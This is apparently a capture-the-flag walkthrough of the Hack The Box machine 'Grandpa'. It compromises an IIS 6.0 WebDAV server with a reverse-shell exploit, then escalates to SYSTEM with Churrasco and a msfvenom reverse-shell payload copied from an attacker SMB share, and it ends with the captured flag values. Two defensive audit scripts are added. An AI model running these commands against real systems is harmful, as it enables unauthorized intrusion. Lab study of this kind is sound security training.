Nmap Results
# Nmap 7.92 scan initiated Sat Aug 20 22:37:39 2022 as: nmap -T5 -p80 -A -oA scan-all -Pn 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Sun, 21 Aug 2022 02:37:51 GMT
| Server Type: Microsoft-IIS/6.0
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 15.02 ms 10.10.14.1
2 15.05 ms 10.10.10.14
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 20 22:37:52 2022 -- 1 IP address (1 host up) scanned in 13.64 seconds
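The Public and Allowed Methods lines Nmap summarised above are what a hardening check looks at. The added example below (not part of the original writeup) parses a raw OPTIONS response, constructed here from the scan's Public and Allow values, and reports which methods outside a read-only allowlist the server advertises versus actually accepts on the scanned path.

```python
"""Audit an HTTP OPTIONS response for risky WebDAV/HTTP methods.

Added example, not code from the original writeup. The sample response
below is constructed from the Public/Allow values the Nmap scan reported.
"""

# Methods a plain content-serving site needs; anything else is reviewed.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "POST"}
# Methods that can create, alter or delete content under the web root.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH"}
# Methods only a WebDAV-enabled server implements.
DAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK", "SEARCH"}

SAMPLE_OPTIONS_RESPONSE = (  # constructed from the scan output above
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Date: Sun, 21 Aug 2022 02:37:51 GMT\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
    "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "Content-Length: 0\r\n\r\n"
)

def parse_headers(raw):
    """Map lower-cased header names to values for a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def methods_from(header_value):
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}

def audit_options(raw):
    """Public = server-wide capability, Allow = what this URL accepts."""
    h = parse_headers(raw)
    advertised = methods_from(h.get("public", ""))
    allowed = methods_from(h.get("allow", ""))
    return {
        "webdav": bool((advertised | allowed) & DAV_METHODS),
        "risky_advertised": sorted(advertised - SAFE_METHODS),
        "risky_allowed": sorted(allowed - SAFE_METHODS),
        "writable_here": sorted(allowed & WRITE_METHODS),
        "trace_enabled": "TRACE" in allowed,
    }

if __name__ == "__main__":
    print(audit_options(SAMPLE_OPTIONS_RESPONSE))
```

The gap between `risky_advertised` and `risky_allowed` is the same one the writeup ran into: PUT and DELETE are advertised server-wide but not accepted on the scanned path.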
Service Enumeration
TCP/80

Gobuster Enumeration
gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r
/Images (Status: 403) [Size: 218]
/_private (Status: 403) [Size: 1529]
/_vti_cnf (Status: 403) [Size: 1529]
/_vti_log (Status: 403) [Size: 1529]
/_vti_pvt (Status: 403) [Size: 1529]
/_vti_txt (Status: 403) [Size: 1529]
/_vti_inf.html (Status: 200) [Size: 1754]
/_vti_bin (Status: 403) [Size: 218]
/aspnet_client (Status: 403) [Size: 218]
/images (Status: 403) [Size: 218]
WebDAV
Unlike the IIS server on Granny, we aren't allowed to use the PUT method on this server. I tried multiple bypass exploits to upload a file to the root of the WebDAV directory, but nothing was sticking. Then, I decided to give this exploit a try:
Exploit
Review the Exploit

In order to run this exploit, we need to pass the following arguments in order:
- Target IP
- Target Port
- Listener IP
- Listener Port
Start a Listener and Catch a Shell
sudo rlwrap nc -lnvp <listener-tcp-port>
python2 iis_reverse_shell.py <target-ip> <target-port> <listener-ip> <listener-port>

Post-Exploit Enumeration
Current User
User Name SID
============================ ========
nt authority\network service S-1-5-20
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================ ================ ============================================== ==================================================
NT AUTHORITY\NETWORK SERVICE User S-1-5-20 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
GRANPA\IIS_WPG Alias S-1-5-21-1709780765-3897210020-3926566182-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
OS & Kernel
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 2 Hours, 0 Minutes, 7 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2293 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 713 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,256 MB
Page File: In Use: 214 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
Users
User accounts for \\GRANPA
-------------------------------------------------------------------------------
Administrator ASPNET Guest
Harry IUSR_GRANPA IWAM_GRANPA
SUPPORT_388945a0
Groups
Aliases for \\GRANPA
-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*IIS_WPG
*Network Configuration Operators
*OWS_209498277_admin
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
Network
Interfaces
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.10.10.14
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
ARP Table
N/A
Routes
N/A
Open Ports
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:1027 0.0.0.0:0 LISTENING 404
TCP 0.0.0.0:5859 0.0.0.0:0 LISTENING 4
TCP 10.10.10.14:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING 1936
Ping Sweep
N/A
Processes
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 272 Console 0 460 K
csrss.exe 320 Console 0 3,344 K
winlogon.exe 344 Console 0 9,736 K
services.exe 392 Console 0 5,180 K
lsass.exe 404 Console 0 7,492 K
svchost.exe 580 Console 0 3,052 K
svchost.exe 668 Console 0 3,708 K
svchost.exe 732 Console 0 4,008 K
svchost.exe 752 Console 0 3,448 K
svchost.exe 788 Console 0 17,784 K
spoolsv.exe 924 Console 0 4,136 K
msdtc.exe 952 Console 0 4,424 K
cisvc.exe 1064 Console 0 2,504 K
svchost.exe 1112 Console 0 2,052 K
inetinfo.exe 1168 Console 0 8,688 K
svchost.exe 1204 Console 0 1,320 K
VGAuthService.exe 1312 Console 0 9,068 K
vmtoolsd.exe 1380 Console 0 14,416 K
svchost.exe 1480 Console 0 5,560 K
svchost.exe 1588 Console 0 3,772 K
dllhost.exe 1764 Console 0 7,084 K
alg.exe 1936 Console 0 2,804 K
wmiprvse.exe 1964 Console 0 9,172 K
wmiprvse.exe 2292 Console 0 5,076 K
w3wp.exe 2420 Console 0 58,752 K
davcdata.exe 2492 Console 0 2,688 K
cidaemon.exe 1100 Console 0 1,232 K
cidaemon.exe 1372 Console 0 1,920 K
cidaemon.exe 1604 Console 0 1,340 K
logon.scr 2964 Console 0 1,504 K
c.exe 3308 Console 0 1,544 K
wmiprvse.exe 3780 Console 0 4,212 K
tasklist.exe 3636 Console 0 3,668 K
Services
These Windows services are started:
Application Experience Lookup Service
Application Layer Gateway Service
Automatic Updates
COM+ Event System
COM+ System Application
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
HTTP SSL
IIS Admin Service
Indexing Service
IPSEC Services
Logical Disk Manager
Network Connections
Network Location Awareness (NLA)
Plug and Play
Print Spooler
Protected Storage
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Terminal Services
VMware Alias Manager and Ticket Service
VMware Tools
Windows Audio
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
World Wide Web Publishing Service
Scheduled Tasks
Unable to enumerate, access denied.
Privilege Escalation
Windows-Exploit-Suggester
On the target, run the command systeminfo and copy the output into a file on Kali. Then, check the target's patch level against a list downloaded from Microsoft.
windows-exploit-suggester.py -u
windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo.txt -l
The Grandparents
Since Grandpa is the same operating system as the Granny host, I decided to give the Churrasco exploit another go here. Because IIS runs under a service account (NT AUTHORITY\NETWORK SERVICE here, as the whoami output above shows), that account holds SeImpersonatePrivilege, so stealing the SYSTEM token is straightforward. The churrasco.exe payload makes this easy for us by impersonating SYSTEM and executing a payload of our choosing.
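As an added example (not from the original writeup), the following parses `whoami /priv` output like the table captured above and flags the token privileges that make a service account a privilege-escalation candidate; the input is constructed from the page's own privilege table, and the check treats a held-but-Disabled privilege as still held, since a process can re-enable any privilege present in its token.

```python
"""Flag token-impersonation privileges in `whoami /priv` output.

Added example, not from the original writeup. The sample input is the
privilege table the writeup captured from the IIS worker-process account.
"""
import re

# Privileges that let a process obtain or run under another account's token.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

WHOAMI_PRIV_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# One table row: privilege name, free-text description, then the state.
LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")

def parse_privileges(text):
    """Return {privilege name: 'Enabled' | 'Disabled'} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def token_risk(privs):
    """Token privileges the account holds. A 'Disabled' entry still counts:
    it is present in the token and can be enabled with AdjustTokenPrivileges."""
    return sorted(p for p in privs if p in TOKEN_PRIVS)

if __name__ == "__main__":
    held = parse_privileges(WHOAMI_PRIV_OUTPUT)
    print("token privileges held:", token_risk(held))
```

Run the same parser over `whoami /priv` from each application-pool identity on a server you administer to see which pools would be exposed the same way.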
Running the Exploit
Download the Exploit
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
Generate a Msfvenom Payload
msfvenom -p windows/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -f exe -a x86 --platform windows -o privesc.exe
Transfer the Files
Start a SMB Server on Kali
smbserver.py -smb2support evil $PWD
Copy the Files to the Target
Run these commands on the target. They make an SMB client connection back to Kali and copy the files into the target's current directory.
copy \\kali-vpn-ip\evil\churrasco.exe .
copy \\kali-vpn-ip\evil\privesc.exe .
Start a Listener on Kali and Run the Exploit
sudo rlwrap nc -lnvp <msfvenom-tcp-port>
.\churrasco.exe -d .\privesc.exe

Flags
C:\Documents and Settings\Harry\Desktop\user.txt
bdff5ec67c3cff017f2bedc146a5d869
C:\Documents and Settings\Administrator\Desktop\root.txt
9359e905a2c35f861f6a57cecf28bb7b